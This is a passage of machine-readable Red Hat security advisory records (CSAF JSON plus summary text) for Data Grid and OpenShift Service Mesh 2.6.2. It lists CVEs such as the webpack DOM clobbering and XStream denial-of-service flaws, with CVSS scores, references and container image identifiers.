"2024-12-17T18:59:59+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:10214", initial_release_date: "2024-11-25T16:56:04+00:00", revision_history: [ { date: "2024-11-25T16:56:04+00:00", number: "1", summary: "Initial version", }, { date: "2024-11-25T16:56:04+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-17T18:59:59+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "Red Hat Data Grid", product: { name: "Red Hat Data Grid", product_id: "Red Hat Data Grid", product_identification_helper: { cpe: "cpe:/a:redhat:jboss_data_grid:8", }, }, }, ], category: "product_family", name: "Red Hat JBoss Data Grid", }, ], category: "vendor", name: "Red Hat", }, ], }, vulnerabilities: [ { cve: "CVE-2024-43788", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-08-27T17:20:06.890123+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2308193", }, ], notes: [ { category: "description", text: "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.", title: "Vulnerability description", }, { category: "summary", text: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", title: "Vulnerability summary", }, { category: "other", text: "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "Red Hat Data Grid", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43788", }, { category: "external", summary: "RHBZ#2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43788", url: "https://www.cve.org/CVERecord?id=CVE-2024-43788", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43788", }, { category: "external", summary: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", url: "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61", }, { category: "external", summary: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", url: "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986", }, { category: "external", summary: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", url: "https://research.securitum.com/xss-in-amp4email-dom-clobbering", }, { category: "external", summary: "https://scnps.co/papers/sp23_domclob.pdf", url: "https://scnps.co/papers/sp23_domclob.pdf", }, ], release_date: "2024-08-27T17:15:07.967000+00:00", remediations: [ { category: "vendor_fix", date: "2024-11-25T16:56:04+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "Red Hat Data Grid", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "Red Hat Data Grid", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, products: [ "Red Hat Data Grid", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule", }, { cve: "CVE-2024-47072", cwe: { id: "CWE-502", name: "Deserialization of Untrusted Data", }, discovery_date: "2024-11-08T13:47:39.374198+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2324606", }, ], notes: [ { category: "description", text: "A flaw was found in the XStream library. A remote attacker may trigger a denial of service by manipulating the processed input stream when XStream is configured to use the BinaryStreamDriver. This issue may lead to the termination of the application.", title: "Vulnerability description", }, { category: "summary", text: "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream", title: "Vulnerability summary", }, { category: "other", text: "This vulnerability in XStream is considered an Important severity rather than Moderate because it exposes applications to a denial of service (DoS) attack with relative ease. By exploiting the flaw in the `BinaryStreamDriver`, an attacker can manipulate the binary input stream to trigger a stack overflow, which terminates the application unexpectedly. Unlike moderate vulnerabilities, which may require specific conditions or limited privileges, this flaw enables remote attackers to forcefully terminate services by crafting malicious input, impacting system availability. Additionally, the vulnerability’s reliance on a common serialization mechanism elevates the risk, as it may affect applications across various environments and industries where XStream is deployed.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "Red Hat Data Grid", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-47072", }, { category: "external", summary: "RHBZ#2324606", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2324606", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-47072", url: "https://www.cve.org/CVERecord?id=CVE-2024-47072", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-47072", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-47072", }, { category: "external", summary: "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266", url: "https://github.com/x-stream/xstream/commit/bb838ce2269cac47433e31c77b2b236466e9f266", }, { category: "external", summary: "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q", url: "https://github.com/x-stream/xstream/security/advisories/GHSA-hfq9-hggm-c56q", }, { category: "external", summary: "https://x-stream.github.io/CVE-2024-47072.html", url: "https://x-stream.github.io/CVE-2024-47072.html", }, ], release_date: "2024-11-07T23:38:52.978000+00:00", remediations: [ { category: "vendor_fix", date: "2024-11-25T16:56:04+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "Red Hat Data Grid", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:10214", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "Red Hat Data Grid", ], }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "Red Hat Data Grid", ], }, ], threats: [ { category: "impact", details: "Important", }, ], title: "com.thoughtworks.xstream: XStream is vulnerable to a Denial of Service attack due to stack overflow from a manipulated binary input stream", }, ], }
rhsa-2024_7726
Vulnerability from csaf_redhat
Published
2024-10-07 09:24
Modified
2024-12-18 04:38
Summary
Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2
Notes
Topic
Red Hat OpenShift Service Mesh Containers for 2.6.2
This update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a
detailed severity rating, is available for each vulnerability from the CVE
link(s) in the References section.
Details
Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.
Security Fix(es):
* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)
* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)
* express: Improper Input Handling in Express Redirects (CVE-2024-43796)
* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)
* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule
(CVE-2024-43788)
* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)
* envoy: Malicious log injection via access logs (CVE-2024-45808)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)
* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)
* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Terms of Use
This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.
{ document: { aggregate_severity: { namespace: "https://access.redhat.com/security/updates/classification/", text: "Important", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright © Red Hat, Inc. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Red Hat OpenShift Service Mesh Containers for 2.6.2\n\nThis update has a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a\ndetailed severity rating, is available for each vulnerability from the CVE\nlink(s) in the References section.", title: "Topic", }, { category: "general", text: "Red Hat OpenShift Service Mesh is Red Hat's distribution of the Istio service mesh project, tailored for installation into an OpenShift Container Platform installation.\n\nSecurity Fix(es):\n* send: Code Execution Vulnerability in Send Library (CVE-2024-43799)\n* serve-static: Improper Sanitization in serve-static (CVE-2024-43800)\n* express: Improper Input Handling in Express Redirects (CVE-2024-43796)\n* path-to-regexp: Backtracking regular expressions cause ReDoS (CVE-2024-45296)\n* webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule\n(CVE-2024-43788)\n* body-parser: Denial of Service Vulnerability in body-parser (CVE-2024-45590)\n* envoy: Malicious log injection via access logs (CVE-2024-45808)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n* envoy: Envoy crashes for `LocalReply` in HTTP async client (CVE-2024-45810)\n* curl: libcurl: ASN.1 date parser overread (CVE-2024-7264)\n* envoy: Potential to manipulate `x-envoy` headers from external sources (CVE-2024-45806)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.", title: "Details", }, { category: "legal_disclaimer", text: "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.", title: "Terms of Use", }, ], publisher: { category: "vendor", contact_details: "https://access.redhat.com/security/team/contact/", issuing_authority: "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.", name: "Red Hat Product Security", namespace: "https://www.redhat.com", }, references: [ { category: "self", summary: "https://access.redhat.com/errata/RHSA-2024:7726", url: "https://access.redhat.com/errata/RHSA-2024:7726", }, { category: "external", summary: "https://access.redhat.com/security/updates/classification/#important", url: "https://access.redhat.com/security/updates/classification/#important", }, { category: "external", summary: "2301888", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2301888", }, { category: "external", summary: "2308193", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2308193", }, { category: "external", summary: "2310908", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2310908", }, { category: "external", summary: "2311152", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311152", }, { category: "external", summary: "2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "2311171", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311171", }, { category: "external", summary: "2313683", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313683", }, { category: "external", summary: "2313685", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313685", }, { category: "external", summary: "2313687", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2313687", }, { category: "external", summary: "OSSM-3337", url: "https://issues.redhat.com/browse/OSSM-3337", }, { category: "external", summary: "OSSM-8001", url: "https://issues.redhat.com/browse/OSSM-8001", }, { category: "external", summary: "OSSM-8099", url: "https://issues.redhat.com/browse/OSSM-8099", }, { category: "self", summary: "Canonical URL", url: "https://security.access.redhat.com/data/csaf/v2/advisories/2024/rhsa-2024_7726.json", }, ], title: "Red Hat Security Advisory: Red Hat OpenShift Service Mesh Containers for 2.6.2", tracking: { current_release_date: "2024-12-18T04:38:31+00:00", generator: { date: "2024-12-18T04:38:31+00:00", engine: { name: "Red Hat SDEngine", version: "4.2.3", }, }, id: "RHSA-2024:7726", initial_release_date: "2024-10-07T09:24:48+00:00", revision_history: [ { date: "2024-10-07T09:24:48+00:00", number: "1", summary: "Initial version", }, { date: "2024-10-07T09:24:48+00:00", number: "2", summary: "Last updated version", }, { date: "2024-12-18T04:38:31+00:00", number: "3", summary: "Last generated version", }, ], status: "final", version: "3", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_name", name: "RHOSSM 2.6 for RHEL 8", product: { name: "RHOSSM 2.6 for RHEL 8", product_id: "8Base-RHOSSM-2.6", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.6::el8", }, }, }, { category: "product_name", name: "RHOSSM 2.6 for RHEL 9", product: { name: "RHOSSM 2.6 for RHEL 9", product_id: "9Base-RHOSSM-2.6", product_identification_helper: { cpe: "cpe:/a:redhat:service_mesh:2.6::el9", }, }, }, ], category: "product_family", name: "Red Hat OpenShift Service Mesh", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:29cf0230854ac71bb01095db0b07783bac74d12b4164d263bd66f1d225fb48bd?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:b72249b5326e4606f53a0130f099ccb636241de275891f98e0a622c8db1a4c9c?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", product_id: "openshift-service-mesh/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b_ppc64le", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:58760b14fd38690a490f7a5ea01e44c5ceee193324488ed4016203c042f88e7b?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:ce49c56b67a541d00a985c7e7da4a8d36d968f93bafd5d037586476c3583f9d8?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32_ppc64le", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:7a35294bd4d2a4f9d2fbc3ac1f24e8aef5aa0a84c2780c275348c77df68f5a32?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:32d02294f6c3ed5ee704852afb31a98777eeae19fa48f2cfbfa0aa17701eb025?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d_ppc64le", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:231e044e7f872d658114881aab776604e583d2b8da0448a2272ffd15c711db3d?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", product_id: "openshift-service-mesh/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578_ppc64le", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:03e25e6be5dd9909f4917494c282eaa888bcb3e2a1b6fdb6e819be8bfcde3578?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e_ppc64le", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:11e2e2f3a3b26a9d79573277c6f38d06f6906bdda547556fe92eee57a89fe86e?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794_ppc64le", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:8e103924f51e6697e0a6890e9aaafd9b48e1fef7a8300badcac6bb0220807794?arch=ppc64le&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "ppc64le", }, { branches: [ { category: "product_version", name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", product: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", product_id: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7_arm64", product_identification_helper: { purl: "pkg:oci/kiali-ossmc-rhel8@sha256:d6ae2eb93558b129b0051980ff73e0e09d41763eb29c2564a28a60281d9f59c7?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-ossmc-rhel8&tag=1.89.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", product: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", product_id: "openshift-service-mesh/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112_arm64", product_identification_helper: { purl: "pkg:oci/istio-cni-rhel8@sha256:c5562019a94ccaa070d4c2107b992847ecfdee49c1f4dd3043e3c20307b74112?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-cni-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", product: { name: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", product_id: "openshift-service-mesh/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375_arm64", product_identification_helper: { purl: "pkg:oci/grafana-rhel8@sha256:26d5dec1bf366dac99df61dd31cf8a6a6937b4e81d1d61a3b3b57e7bf8ee3375?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/grafana-rhel8&tag=2.6.2-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", product: { name: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", product_id: "openshift-service-mesh/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8@sha256:4223dcfd7630709f2841b220281120cc6010548d8e59e27cebdf304f16fcf3ac?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8&tag=1.89.4-3", }, }, }, { category: "product_version", name: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", product: { name: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", product_id: "openshift-service-mesh/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec_arm64", product_identification_helper: { purl: "pkg:oci/kiali-rhel8-operator@sha256:80ad09921b68b246a30bcfebef670cac228e5b8e0a7db63c0462e09a518d68ec?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/kiali-rhel8-operator&tag=1.89.6-1", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", product: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", product_id: "openshift-service-mesh/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5_arm64", product_identification_helper: { purl: "pkg:oci/istio-must-gather-rhel8@sha256:7a69b6ecf90b9be263edfca0ffa4f40cb8c076f7472559efb09a83a48da92de5?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-must-gather-rhel8&tag=2.6.2-4", }, }, }, { category: "product_version", name: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", product: { name: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", product_id: "openshift-service-mesh/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc_arm64", product_identification_helper: { purl: "pkg:oci/istio-rhel8-operator@sha256:cf746daf197865ecb846af2475fcea56c0555c8bdafb7864d4718f1da3d872dc?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/istio-rhel8-operator&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", product: { name: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", product_id: "openshift-service-mesh/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b_arm64", product_identification_helper: { purl: "pkg:oci/pilot-rhel8@sha256:a99e9d30ac8b5767b7eb95c3183f8dde99130ce5441928da1082a4e48108715b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/pilot-rhel8&tag=2.6.2-5", }, }, }, { category: "product_version", name: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", product: { name: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", product_id: "openshift-service-mesh/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e_arm64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel9@sha256:cdfee2e141fa6559a6c64373177a4a666e39052add4498b880c08c496e25109e?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel9&tag=2.6.2-7", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3_arm64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:40e075e75225da1082774c0ec33b314b9659d27e36fb698726d466a7be0e63f3?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.6.2-3", }, }, }, ], category: "architecture", name: "arm64", }, { branches: [ { category: "product_version", name: 